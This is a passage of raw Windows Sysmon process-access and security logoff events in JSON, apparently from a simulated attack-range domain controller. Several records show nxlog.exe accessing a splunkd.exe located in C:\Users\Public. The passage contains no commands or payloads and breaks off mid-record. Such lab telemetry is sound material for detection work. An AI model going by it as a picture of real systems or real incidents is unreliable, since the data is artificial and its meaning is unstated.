06:59:40.149","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.149\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.149","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.149\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.149","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220698,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA038C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa038c","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:41.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:41.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:42.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:42.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:43.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:43.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:44.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 